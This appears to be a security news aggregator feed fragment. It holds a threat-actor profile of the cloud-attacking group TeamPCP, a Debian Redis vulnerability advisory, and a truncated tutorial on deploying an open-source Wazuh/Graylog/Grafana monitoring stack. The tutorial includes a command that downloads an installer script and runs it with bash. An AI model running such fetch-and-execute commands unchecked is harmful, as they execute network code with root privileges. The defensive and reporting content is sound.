<span data-contrast="auto">Cybersecurity researchers at <a href="https://cyble.com/threat-actor-profiles/teampcp/" target="_blank" rel="nofollow noopener">Cyble</a> have identified TeamPCP as a cloud-focused cybercriminal operation that emerged as a large-scale exploitation platform in late 2025. The group is also tracked under several aliases, including DeadCatx3, PCPcat, PersyPCP, and ShellForce.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

[caption id="" align="alignnone" width="936"]<img src="https://cyble.com/wp-content/uploads/2026/02/image-24.png" alt="TeamPCP" width="936" height="547"> Image Source: X[/caption]

<span data-contrast="auto">Unlike threat actors that depend heavily on zero-day vulnerabilities, TeamPCP has reportedly built its operations around automation and the exploitation of known weaknesses and cloud misconfigurations. Researchers say the group combines these methods into a scalable and largely self-propagating attack framework.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Beginning in late 2025, TeamPCP launched extensive scanning campaigns targeting exposed Docker APIs, Kubernetes control planes, Ray dashboards, and Redis services. Once access is achieved, compromised systems are integrated into a distributed infrastructure used for proxying internet traffic, performing additional scans, hosting command-and-control infrastructure, deploying ransomware, and conducting unauthorized <a href="https://thecyberexpress.com/linux-botnet-combines-cryptomining-and-ddos/" target="_blank" rel="noopener">cryptomining</a> operations.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="3"><b><span data-contrast="none">Operational Structure Behind the Cyberattack on GitHub</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":281,"335559739":281}'> </span></h3>
<span data-contrast="auto">The operational model used by TeamPCP differs from many conventional cybercriminal campaigns because it prioritizes cloud-native environments over traditional end-user devices. Instead of relying primarily on <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-phishing/" target="_blank" rel="noopener" title="phishing" data-wpil-keyword-link="linked" data-wpil-monitor-id="28352">phishing</a> campaigns against individual users, the group focuses on exposed administrative services and container orchestration platforms.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Researchers observed that TeamPCP attack chains commonly begin with automated internet-wide scanning for externally accessible services that either lack authentication or are improperly secured. This allows the group to scale attacks rapidly across large numbers of organizations without relying on highly customized exploitation techniques.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">The GitHub cyberattack appears consistent with the group’s broader strategy of targeting software development environments and cloud infrastructure that can provide access to sensitive operational resources.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="3"><b><span data-contrast="none">Countries and Industries Impacted by TeamPCP</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":281,"335559739":281}'> </span></h3>
<span data-contrast="auto">Security researchers said TeamPCP activity has been observed across multiple countries, including the United Arab Emirates, Canada, <a href="https://thecyberexpress.com/shinhan-card-data-breach/" target="_blank" rel="noopener">South Korea</a>, Serbia, the United States, and Vietnam. Researchers noted that the group’s targeting pattern appears opportunistic rather than politically motivated, with attacks primarily focused on exposed infrastructure.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Industries affected by TeamPCP operations include Banking, Financial Services, and Insurance (BFSI), consumer goods, and professional services organizations. These sectors often depend heavily on scalable cloud-based systems and internet-facing services, making them vulnerable to automated scanning campaigns, cloud misconfiguration abuse, <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-ransomware/" target="_blank" rel="noopener" title="ransomware" data-wpil-keyword-link="linked" data-wpil-monitor-id="28348">ransomware</a> deployment, and cryptomining activities.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Upstash for Redis vs Supabase vs Neon: Which One Fits Vibe Coding Workflows in 2026?]]></title>
<description><![CDATA[Not all database platforms are built for the same job.Not all database platforms are built for the same job. Here is how Upstash, Supabase, and Neon actually differ — and which one fits your vibe coding workflow in 2026.
The post Upstash for Redis vs Supabase vs Neon: Which One Fits Vibe Coding W...]]></description>
<link>https://tsecurity.de/de/3530994/ai-nachrichten/upstash-for-redis-vs-supabase-vs-neon-which-one-fits-vibe-coding-workflows-in-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3530994/ai-nachrichten/upstash-for-redis-vs-supabase-vs-neon-which-one-fits-vibe-coding-workflows-in-2026/</guid>
<pubDate>Wed, 20 May 2026 00:18:03 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Not all database platforms are built for the same job.Not all database platforms are built for the same job. Here is how Upstash, Supabase, and Neon actually differ — and which one fits your vibe coding workflow in 2026.</p>
<p>The post <a href="https://www.marktechpost.com/2026/05/19/upstash-for-redis-vs-supabase-vs-neon-which-one-fits-vibe-coding-workflows-in-2026/">Upstash for Redis vs Supabase vs Neon: Which One Fits Vibe Coding Workflows in 2026?</a> appeared first on <a href="https://www.marktechpost.com/">MarkTechPost</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[DSA-6279-1 redis - security update]]></title>
<description><![CDATA[Brief introduction 

CVE-2025-67733

    A flaw in the Lua scripting error path allowed an authenticated user
    to embed CR/LF byte sequences in an error reply produced via
    redis.error_reply() or the Lua error() function. Because RESP uses
    CRLF as a frame delimiter, an injected sequence...]]></description>
<link>https://tsecurity.de/de/3528894/unix-server/dsa-6279-1-redis-security-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3528894/unix-server/dsa-6279-1-redis-security-update/</guid>
<pubDate>Tue, 19 May 2026 13:30:40 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Brief introduction 
<p>
CVE-2025-67733
</p><p>
    A flaw in the Lua scripting error path allowed an authenticated user
    to embed CR/LF byte sequences in an error reply produced via
    redis.error_reply() or the Lua error() function. Because RESP uses
    CRLF as a frame delimiter, an injected sequence could be interpreted
    by the client as the start of an unrelated reply, allowing an
    attacker to inject arbitrary content into the response stream and
    tamper with data read by other commands on the same connection.
</p><p>
CVE-2026-21863
</p><p>
    The cluster bus packet validation in clusterProcessPacket() did not
    verify that the gossip-section count and per-extension header
    declared by an incoming PING, PONG or MEET message actually fit
    within the received packet. A peer with access to the cluster bus
    port could send a specially crafted message whose declared lengths
    exceed the packet size, causing the server to read out of bounds and
    potentially crash, resulting in a denial of service.

</p><p>
<a href="https://security-tracker.debian.org/tracker/DSA-6279-1">https://security-tracker.debian.org/tracker/DSA-6279-1</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Open Source Security IT Platform: Threat Detection, Logging, Alerts, AI and SSO integration.]]></title>
<description><![CDATA[A real-world implementation with Wazuh, Graylog, MongoDB, Grafana, Nginx, OAuth2-Proxy, Redis, AI and SSO — no licenses, no vendor lock-in.Managing IT infrastructure security without commercial tools is entirely possible. This documenting the implementation of a complete open source security plat...]]></description>
<link>https://tsecurity.de/de/3528497/hacking/open-source-security-it-platform-threat-detection-logging-alerts-ai-and-sso-integration/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3528497/hacking/open-source-security-it-platform-threat-detection-logging-alerts-ai-and-sso-integration/</guid>
<pubDate>Tue, 19 May 2026 11:23:42 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><strong>A real-world implementation with Wazuh, Graylog, MongoDB, Grafana, Nginx, OAuth2-Proxy, Redis, AI and SSO — no licenses, no vendor lock-in.</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*UMOUaxSeMAE6VlSdtFrnJg.jpeg"></figure><p>Managing IT infrastructure security without commercial tools is entirely possible. This documenting the implementation of a complete open source security platform, deployed in production.</p><p>This is not a generic tutorial. It’s a guide based on real decisions, and an architecture that runs in production today.</p><h3>What problem does this platform solve?</h3><p>In any organization, visibility into what’s happening on servers tends to be fragmented: logs are scattered across different locations, alerts don’t arrive in real time, and each system has its own credentials. The result is an IT team that reacts instead of anticipating.</p><p>This platform centralizes three critical capabilities:</p><ul><li><strong>Threat detection</strong> — Wazuh monitors security events, file integrity, and system behavior in real time.</li><li><strong>Log management</strong> — Graylog receives, indexes, alerts, and allows querying all infrastructure logs from a single point.</li><li><strong>Operational visualization</strong> — Grafana delivers real-time dashboards.</li></ul><p>All of this is accessible through <strong>a single sign-on</strong> using the corporate account, thanks to OAuth2-Proxy.</p><h3>The architecture in brief</h3><p>The solution is built on five layers:</p><p><strong>Detection layer:</strong> Wazuh acts as the SIEM/XDR engine. It analyzes events, correlates alerts, and generates notifications. These events/alerts are sent to Graylog via Fluent Bit.</p><p><strong>Transport layer:</strong> Fluent Bit reads Wazuh events and forwards them to Graylog over RAW TCP. It’s lightweight, efficient, and highly configurable.</p><p><strong>Log management layer:</strong> Graylog parses the JSON data, indexes all events, enables natural language searches, and exposes an Bridge that we later integrate with Claude via MCP.</p><p><strong>Visualization layer:</strong> Grafana connects to Wazuh as a datasource and presents data in real-time operational dashboards.</p><p><strong>Access layer:</strong> Nginx acts as a reverse proxy with TLS ar HTTP header-based authentication. OAuth2-Proxy validates user identity against OIDC and propagates it to each application. Redis stores the sessions.</p><h3>Technology stack</h3><p>The entire stack is open source and runs on a single Linux server:</p><ul><li>Ubuntu 26.04 LTS</li><li>Wazuh v4.14.5</li><li>Graylog v7.1.0</li><li>MongoDB v7.0</li><li>Grafana v13.0.1</li><li>OAuth2-Proxy v7.15.2</li><li>Fluent Bit v5.0.5</li><li>Nginx v1.28.3</li><li>Redis v8.0.5</li></ul><p><strong>Hardware:</strong> Minimum 8 CPU cores, 16 GB RAM <br><strong>Storage:</strong> Dedicated LVM volumes (OS, data and logs separated)</p><h3>Why this design?</h3><p>Two architectural decisions deserve explanation:</p><p><strong>Separate LVM volumes.</strong> The operating system, application data, and logs live on independent partitions. If logs grow out of control, they don’t affect the OS or application data. Scaling log storage is as simple as expanding the corresponding volume.</p><p><strong>A single authentication point.</strong> Instead of managing users and passwords separately, OAuth2-Proxy delegates all authentication to IdP. The user logs in once and accesses all three systems. Local credentials are eliminated from the lifecycle.</p><h3>What’s coming in the next articles</h3><p>This series covers the complete implementation, component by component:</p><ol><li><strong>Introduction and architecture</strong> ← you are here</li><li><a href="https://infosecwriteups.com/open-source-security-platform-for-it-infrastructure-centralizing-threat-detection-logs-and-sso-c08d1b412f37#2776">Wazuh</a> — SIEM/XDR</li><li><a href="https://infosecwriteups.com/open-source-security-platform-for-it-infrastructure-centralizing-threat-detection-logs-and-sso-c08d1b412f37#8987">MongoDB</a> — Graylog’s DB</li><li><a href="https://infosecwriteups.com/open-source-security-platform-for-it-infrastructure-centralizing-threat-detection-logs-and-sso-c08d1b412f37#a640">Graylog</a> — Log management, data input, alerts</li><li><a href="https://infosecwriteups.com/open-source-security-platform-for-it-infrastructure-centralizing-threat-detection-logs-and-sso-c08d1b412f37#f229">Fluent Bit</a> — Log shipper</li><li><a href="https://infosecwriteups.com/open-source-security-platform-for-it-infrastructure-centralizing-threat-detection-logs-and-sso-c08d1b412f37#014b">Grafana</a> — Real-Time Operational Dashboards</li><li><a href="https://infosecwriteups.com/open-source-security-platform-for-it-infrastructure-centralizing-threat-detection-logs-and-sso-c08d1b412f37#4874">OAuth2-Proxy</a> — Single Sign-On with IdP (Identity Provider)</li><li><a href="https://infosecwriteups.com/open-source-security-platform-for-it-infrastructure-centralizing-threat-detection-logs-and-sso-c08d1b412f37#3b56">Redis</a> — Session Persistence and Storage</li><li><a href="https://infosecwriteups.com/open-source-security-platform-for-it-infrastructure-centralizing-threat-detection-logs-and-sso-c08d1b412f37#b390">Nginx</a> — Reverse Proxy with TLS and Header-Based Authentication</li><li><a href="https://infosecwriteups.com/open-source-security-platform-for-it-infrastructure-centralizing-threat-detection-logs-and-sso-c08d1b412f37#fcdf">Troubleshooting Guide</a></li><li><a href="https://infosecwriteups.com/open-source-security-platform-for-it-infrastructure-centralizing-threat-detection-logs-and-sso-c08d1b412f37#938b">Authentication </a>— Four steps: SSO and intregation Graylog with Wazuh</li><li><a href="https://infosecwriteups.com/open-source-security-platform-for-it-infrastructure-centralizing-threat-detection-logs-and-sso-c08d1b412f37#e3ed">Graylog Ingest</a> — Configuring Data Ingest from Fluent Bit</li><li><a href="https://infosecwriteups.com/open-source-security-platform-for-it-infrastructure-centralizing-threat-detection-logs-and-sso-c08d1b412f37#6a74">Graylog MCP + Claude</a> — Querying logs in natural language with AI</li><li><a href="https://infosecwriteups.com/open-source-security-platform-for-it-infrastructure-centralizing-threat-detection-logs-and-sso-c08d1b412f37#48e5">Final architecture, evidences, and conclusions</a></li></ol><p>Each article includes the exact commands used in production.</p><p>Recommendation: Create a working directory. In some sections, we jump to different directories cd; after each step, return to the directory.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/0*469jrtAPhs6EMetM.png"></figure><h3>Wazuh: SIEM/XDR</h3><p><strong><em>Part 2</em></strong></p><p>This article covers the foundation of the entire stack: the server where the platform lives, and the installation and configuration of Wazuh — the SIEM/XDR engine that detects and correlates security events in real time.</p><p><strong>The server platform<br></strong>Before installing any component, it’s worth explaining the storage decision. We use <strong>separate LVM volumes</strong> for the operating system, application data, and logs:</p><p>Volume Size Path Operating system 60 GB / Data 150 GB /data Logs 20 GB /log Swap 4 GB — estimate sizes based on own infrastructure.</p><p><strong>Why this separation?</strong> If logs grow out of control — and they will — they don’t affect the operating system or application data. Scaling log storage is as simple as expanding the /log volume without touching anything else. The same logic applies to application data in /data.</p><p><strong>Wazuh: the detection engine<br></strong>Wazuh is an open source SIEM (Security Information and Event Management) and XDR (Extended Detection and Response) platform. In practical terms, it continuously monitors system events, correlates alerts, detects file integrity issues, access anomalies, and much more.</p><p>In this implementation, Wazuh serves two roles:</p><ol><li><strong>Detection</strong> — analyzes operating system and service events.</li><li><strong>Export</strong> — generates alerts in JSON format that Fluent Bit forwards to Graylog.</li></ol><h3>Installation</h3><p>Wazuh’s installation is notable for its simplicity: a single script handles the entire stack (Wazuh Manager, Indexer, and Dashboard).</p><pre>curl -sO https://packages.wazuh.com/4.14/wazuh-install.sh &amp;&amp; bash ./wazuh-install.sh -a</pre><blockquote><strong><em>Info: </em></strong>Despite the compatibility information, it works without problems with Ubuntu 26.04.</blockquote><blockquote>“The recommended systems are: Red Hat Enterprise Linux 7, 8, 9; CentOS 7, 8; Amazon Linux 2; Amazon Linux 2023; Ubuntu 16.04, 18.04, 20.04, 22.04; Rocky Linux 9.4”</blockquote><blockquote><strong><em>Test environments:</em></strong><em> If the server doesn’t meet the minimum hardware requirements (4 GB RAM, 2 CPU cores), add the </em><em>-i argument to skip the validation.</em></blockquote><h3>Configuration</h3><p>The Wazuh installer places its data in default paths /var/lib/wazuh-indexer, /var/ossec/logs. We need to mount bind them to our LVM volumes while keeping the original paths functional.</p><pre># Stop services<br><br>systemctl stop wazuh-indexer wazuh-dashboard wazuh-manager filebeat</pre><p>Filebeat is included in the Wazuh installation but we’ll replace it with Fluent Bit, which is lighter and more flexible for forwarding events to Graylog.</p><pre># Disable Filebeat<br><br>systemctl disable filebeat</pre><pre># Create directory structure<br><br>mkdir -p /data/wazuh-indexer/lib /log/wazuh-indexer /data/wazuh/ossec/logs</pre><pre># Assign permissions to the service user and files<br><br>chown wazuh-indexer:wazuh-indexer /data/wazuh-indexer/lib /log/wazuh-indexer<br>chown wazuh:wazuh /data/wazuh/ossec/logs<br>chmod 770 /data/wazuh/ossec/logs </pre><pre># Move existing content<br><br>mv /var/lib/wazuh-indexer/* /data/wazuh-indexer/lib/<br>mv /var/ossec/logs/* /data/wazuh/ossec/logs/</pre><p><strong>Mount with bind — preserving original paths</strong></p><p>The key is using bind mounts: services continue using their default paths, but the actual storage is on the LVM volumes. This avoids modifying Wazuh’s internal configuration.</p><blockquote>Evaluate:<br>With “nofails” the server will start even if the mounts fail, but the services will fail. <br>Omitting “nofails” will start in emergency mode.</blockquote><pre>echo "/data/wazuh/ossec/logs /var/ossec/logs none defaults,bind,nofail 0 0" &gt;&gt; /etc/fstab<br>echo "/data/wazuh-indexer/lib /var/lib/wazuh-indexer none defaults,bind,nofail 0 0" &gt;&gt; /etc/fstab<br>echo "/log/wazuh-indexer /var/log/wazuh-indexer none defaults,bind,nofail 0 0" &gt;&gt; /etc/fstab<br>systemctl daemon-reload<br>mount -a</pre><p><strong>Compatibility adjustment for Graylog</strong></p><p>Wazuh Indexer uses OpenSearch with an option that, by default, forces another version for Filebeat compatibility.</p><pre># /etc/wazuh-indexer/opensearch.yml - Comment out<br><br>#compatibility.override_main_response_version: true</pre><blockquote><strong><em>About the Dashboard warning:</em></strong> When connecting Graylog, the Wazuh Dashboard may display a warning about <em>wazuh-alerts-*</em> index patterns. This is a cosmetic warning that does not affect functionality — it can be safely ignored.</blockquote><blockquote><strong><em>Expected scenario:</em></strong> Filebeat cannot send data to the indexer, and alerts will not appear in the Wazuh dashboard.</blockquote><figure><img alt="" src="https://cdn-images-1.medium.com/max/676/1*dpEcqSAQaH46kFkbqa7VoQ.jpeg"><figcaption>warning</figcaption></figure><h3>Adjusting the Dashboard for Nginx</h3><p>The Wazuh Dashboard will listen on 127.0.0.1:8080 instead of the default port, since Nginx will act as a reverse proxy with TLS on port 443.</p><pre># /etc/wazuh-dashboard/opensearch_dashboards.yml<br><br>server.host: 127.0.0.1<br>server.port: 8080</pre><p><strong>Credentials and backup<br></strong>After installation, Wazuh generates a wazuh-install-files.tar file containing certificates, the root CA, and passwords. It's critical to extract and back it up immediately.</p><pre>tar -xvf wazuh-install-files.tar</pre><p>The wazuh-passwords.txt file inside contains all automatically generated passwords. Protecting it is mandatory.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/0*469jrtAPhs6EMetM.png"></figure><h3>MongoDB: Graylog’s DB</h3><p><strong><em>Part 3</em></strong></p><p>MongoDB is the database Graylog uses to store its internal configuration: streams, alerts, dashboards, users, and metadata. It does not store the logs themselves — that’s handled by OpenSearch/ElasticSearch — but it’s an essential component for Graylog to function.</p><p><strong>An important warning before installing</strong></p><p>MongoDB version 8.0 has <strong>kernel incompatibilities with Ubuntu 26.04</strong>. The stable, tested version for this implementation is <strong>7.0</strong>. This is one of those cases where the latest version is not the best choice.</p><h3>Installation</h3><p>Add the official MongoDB 7.0 repository and install.</p><pre>curl -fsSL https://pgp.mongodb.com/server-7.0.asc | gpg -o /usr/share/keyrings/mongodb-server-7.0.gpg --dearmor<br>echo "deb [signed-by=/usr/share/keyrings/mongodb-server-7.0.gpg] https://repo.mongodb.org/apt/ubuntu jammy/mongodb-org/7.0 multiverse" | tee /etc/apt/sources.list.d/mongodb-org-7.0.list<br>apt update<br>apt install mongodb-org -y</pre><h3>Configuration</h3><p>We apply the same pattern as with Wazuh: move data to the /data volume and logs to the /log volume, using bind mounts to keep the original paths intact.</p><pre># Create directory structure<br><br>mkdir -p /data/mongodb/lib /log/mongodb</pre><pre># Assign permissions to the service user<br><br>chown mongodb:mongodb /data/mongodb/lib /log/mongodb</pre><pre># Bind mount<br><br>echo "/data/mongodb/lib /var/lib/mongodb none defaults,bind,nofail 0 0" &gt;&gt; /etc/fstab<br>echo "/log/mongodb /var/log/mongodb none defaults,bind,nofail 0 0" &gt;&gt; /etc/fstab<br>systemctl daemon-reload<br>mount -a</pre><p><strong>Why does this pattern repeat?</strong></p><p>We apply the same storage strategy to every component in the stack. The reason is simple: in a production environment, data must survive an OS reinstallation. If the OS lives on / (60 GB) and data on /data (150 GB), I can reinstall Ubuntu without losing any application data.</p><p>The /log volume (20 GB) is independent because logs have a different lifecycle — they rotate, compress, and get deleted — and we don't want their growth to affect either the OS or application data.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/0*MbvwpOS6jWqHHZiX.png"></figure><h3>Graylog: Centralized Log Management with TLS Integration to Wazuh Indexer</h3><p><strong><em>Part 4</em></strong></p><p>Graylog is the heart of log management in this platform. It receives security events from Fluent Bit, indexes them in OpenSearch (through Wazuh Indexer), enables real-time searches, and exposes an API that we later connect to Claude via MCP.</p><h3>Installation</h3><p>Graylog requires Java as a dependency. We install Java 17 and then the Graylog 7.1 server.</p><pre>apt install openjdk-17-jre-headless -y<br>wget https://packages.graylog2.org/repo/packages/graylog-7.1-repository_latest.deb<br>dpkg -i graylog-7.1-repository_latest.deb<br>apt-get update<br>apt install graylog-server -y</pre><h3>Configuration</h3><pre># Create directory structure<br><br>mkdir -p /data/graylog/lib/journal /data/graylog/jks /var/lib/graylog-server/journal /log/graylog</pre><pre># Assign permissions to the service user<br><br>chown -R graylog:graylog /data/graylog/lib /var/lib/graylog-server/journal /log/graylog</pre><pre># Bind mount<br><br>echo "/data/graylog/lib/journal /var/lib/graylog-server/journal none defaults,bind,nofail 0 0" &gt;&gt; /etc/fstab<br>echo "/log/graylog /var/log/graylog-server none defaults,bind,nofail 0 0" &gt;&gt; /etc/fstab<br>systemctl daemon-reload<br>mount -a</pre><p><strong>Credential configuration</strong></p><p>Graylog requires two key values in its main configuration file.</p><pre># password_secret - internal encryption key (64 characters)<br><br>cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 64 | head -n 1</pre><pre># root_password_sha2 - SHA256 hash of the administrator password<br><br>echo -n '&lt;password&gt;' | shasum -a 256 | cut -d' ' -f1</pre><pre># /etc/graylog/server/server.conf<br><br>password_secret = &lt;password_secret&gt;<br>root_password_sha2 = &lt;root_password&gt;</pre><p><strong>Integration with Wazuh Indexer<br></strong>This is one of the most important steps and the one most frequently omitted in generic guides. Graylog needs to connect to Wazuh Indexer (OpenSearch) over HTTPS, which requires it to trust Wazuh’s CA certificate.</p><p>The solution is to incorporate Wazuh’s CA into a <strong>Java Key Store (JKS)</strong> that Graylog can use.</p><pre># Copy the base Java keystore<br><br>cp /usr/share/graylog-server/jvm/lib/security/cacerts /data/graylog/jks/graylog.jks<br>cd /data/graylog/jks<br><br># Import the Wazuh CA certificate<br># When keytool asks "Trust this certificate? [no]:", answer: y<br># Set a custom or random password<br><br>keytool -importcert -keystore graylog.jks -storepass &lt;password&gt; -alias wazuh-ca -file /etc/wazuh-indexer/certs/root-ca.pem</pre><p>Then configure Graylog to use this keystore at startup.</p><pre># /etc/default/graylog-server - Enter the password defined in the previous step<br><br>GRAYLOG_SERVER_JAVA_OPTS="-Djavax.net.ssl.trustStore=/data/graylog/jks/graylog.jks -Djavax.net.ssl.trustStorePassword=&lt;password&gt;"</pre><pre># Assign permissions to the service user<br><br>chown -R graylog:graylog /data/graylog/jks</pre><p><strong>Why not just disable TLS verification?</strong></p><p>It’s a common temptation to use ssl_verify=false to skip this entire process. The problem is that in production this eliminates a real security layer: any server could present itself as Wazuh Indexer and Graylog would accept it without question. The JKS procedure takes ten extra minutes and guarantees secure communication between components.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/0*YX5kBfyd9o1QNtX5.png"></figure><h3>Fluent Bit: The Bridge Between Wazuh and Graylog</h3><p><strong><em>Part 5</em></strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*whGladAjwDiDE2Ic5UvWlA.jpeg"></figure><p>Fluent Bit is the component that connects Wazuh with Graylog. Its function is simple but critical: read the JSON alerts file that Wazuh generates in real time and forward each event to Graylog over TCP. It’s lightweight, efficient, and consumes minimal resources even under high event load.</p><p><strong>Why Fluent Bit instead of Filebeat?</strong></p><p>Wazuh installs Filebeat by default to export data to ElasticSearch. Filebeat can be configured to send to Graylog (at the same time, Graylog’s data source is Wazuh), but Fluent Bit is significantly lighter, has better support for complex pipelines, and consumes less memory.</p><p>The decision is clear: we disable Filebeat (covered in the Wazuh article) and install Fluent Bit.</p><h3>Installation</h3><p>Ubuntu 26.04 (Resolute Raccoon) doesn’t yet have official Fluent Bit packages. The solution is to use the <strong>Noble</strong> (Ubuntu 24.04) packages, which are compatible.</p><pre>sh -c 'curl https://packages.fluentbit.io/fluentbit.key | gpg --dearmor &gt; /usr/share/keyrings/fluentbit-keyring.gpg'<br>echo "deb [signed-by=/usr/share/keyrings/fluentbit-keyring.gpg] https://packages.fluentbit.io/ubuntu/noble noble main" | tee /etc/apt/sources.list.d/fluent-bit.list<br>apt update<br>apt install fluent-bit -y</pre><h3>Configuration</h3><pre># Create directory structure<br><br>mkdir -p /log/fluent-bit /var/log/fluent-bit</pre><pre># Bind mount<br><br>echo "/log/fluent-bit /var/log/fluent-bit none defaults,bind,nofail 0 0" &gt;&gt; /etc/fstab<br>systemctl daemon-reload<br>mount -a</pre><p><strong>The main configuration file</strong></p><p>This is the core of Fluent Bit. It defines three sections: the global service, the data input (INPUT), and the output (OUTPUT).</p><blockquote><strong><em>Pay attention when copying:</em></strong><em> </em>The Fluent Bit configuration file is sensitive to indentation. Incorrect indentation will prevent the service from starting<em>.</em></blockquote><pre># /etc/fluent-bit/fluent-bit.conf<br><br>[SERVICE]<br>  flush 5<br>  daemon Off<br>  log_level info<br>  log_file /log/fluent-bit/td-agent-bit.log<br>  parsers_file parsers.conf<br>  plugins_file plugins.conf<br>  http_server Off<br>  storage.metrics on<br>  storage.path /tmp/storage<br>  storage.sync normal<br>  storage.checksum off<br>  storage.backlog.mem_limit 5M<br>[INPUT]<br>  name tail<br>  path /var/ossec/logs/alerts/alerts.json<br>  tag wazuh<br>  parser json<br>  Buffer_Max_Size 5MB<br>  Buffer_Chunk_Size 400k<br>  storage.type filesystem<br>  Mem_Buf_Limit 512MB<br>[OUTPUT]<br>  Name tcp<br>  Host localhost<br>  Port 5555<br>  net.keepalive off<br>  Match wazuh<br>  Format json_lines<br>  json_date_key true</pre><p><strong>How the pipeline works</strong></p><ol><li><strong>INPUT </strong><strong>tail</strong> — Reads the /var/ossec/logs/alerts/alerts.json file continuously, similar to tail -f. Every time Wazuh writes a new alert, Fluent Bit detects it.</li><li><strong>Tag </strong><strong>wazuh</strong> — Labels each event so the OUTPUT knows what to process.</li><li><strong>OUTPUT </strong><strong>tcp</strong> — Sends each event to port 5555 on localhost in JSON format, where Graylog will listen with a Raw HTTP input.</li></ol><p>The on-disk buffer storage.type filesystem ensures no events are lost if Graylog is momentarily unreachable. Events accumulate and are resent once the connection is re-established.</p><blockquote><em>Optional: </em>REST API — Monitor Fluent Bit data pipelines.<br><em>https://docs.fluentbit.io/manual/administration/monitoring</em></blockquote><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/0*cbEm4ozA1npayvjy.png"></figure><h3>Grafana: Real-Time Operational Dashboards</h3><p><strong><em>Part 6</em></strong></p><p>Grafana is the visualization layer of the platform. It connects to Wazuh as a datasource and allows building operational dashboards that show in real time the state of the infrastructure: Wazuh alerts, log volume, access patterns, and any metric Graylog or Wazuh can provide.</p><p>In terms of base installation and configuration, Grafana is the simplest component in the stack. The complexity comes later when we integrate SSO authentication.</p><h3>Installation</h3><pre>wget -O /etc/apt/keyrings/grafana.asc https://apt.grafana.com/gpg-full.key<br>echo "deb [signed-by=/etc/apt/keyrings/grafana.asc] https://apt.grafana.com stable main" | tee -a /etc/apt/sources.list.d/grafana.list<br>apt update<br>apt install grafana -y</pre><h3>Configuration</h3><pre># Create directory structure<br><br>mkdir -p /data/grafana/lib /log/grafana</pre><pre># Assign permissions to the service user<br><br>chown grafana:grafana /data/grafana/lib /log/grafana</pre><pre># Bind mount<br><br>echo "/data/grafana/lib /var/lib/grafana none defaults,bind,nofail 0 0" &gt;&gt; /etc/fstab<br>echo "/log/grafana /var/log/grafana none defaults,bind,nofail 0 0" &gt;&gt; /etc/fstab<br>systemctl daemon-reload<br>mount -a</pre><p>The specific security dashboards — visualizing Wazuh alerts, Graylog logs, and service metrics — depend on the datasources we’ll configure once the entire platform is operational.</p><p><strong>A note on the visualization architecture:</strong></p><p>In many similar implementations, Wazuh already includes its own dashboard based on OpenSearch Dashboards (Kibana). So why add Grafana?</p><p>The reason is <strong>datasource flexibility</strong>. The Wazuh Dashboard can only visualize data from Wazuh Indexer. Grafana can simultaneously connect to Wazuh, Prometheus, InfluxDB, SQL databases, and dozens of other sources. A single dashboard can show Wazuh alerts alongside infrastructure metrics, application logs, and any other data source — all in real time, with its own alerting system.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/0*MNHDU6UurKLbz20v.png"></figure><h3>OAuth2-Proxy: Single Sign-On with IdP</h3><p><strong><em>Part 7</em></strong></p><p>OAuth2-Proxy is the component that eliminates the need to manage users and passwords in Wazuh, Graylog, and Grafana separately. Instead, it delegates all authentication to IdP. The user logs in once with their corporate account and accesses all three systems without entering credentials again.</p><p>This article covers the installation of OAuth2-Proxy and its base configuration. The integration with each application is completed in the <a href="https://infosecwriteups.com/open-source-security-platform-for-it-infrastructure-centralizing-threat-detection-logs-and-sso-c08d1b412f37#938b">Authentication article</a>.</p><p><strong>How the flow works:</strong></p><p>When a user accesses <a href="https://wazuh.domain.com/">https://site.domain.com</a></p><ol><li>Nginx receives the request and asks OAuth2-Proxy if the user is authenticated auth_request /oauth2/auth</li><li>If there’s no active session, OAuth2-Proxy redirects the user to IdP portal.</li><li>The user authenticates with their corporate account.</li><li>IdP returns an ID Token to OAuth2-Proxy.</li><li>OAuth2-Proxy validates the token and creates a session stored in Redis.</li><li>Nginx propagates the user’s identity in an HTTP header.</li><li>Each application receives the header and assigns permissions 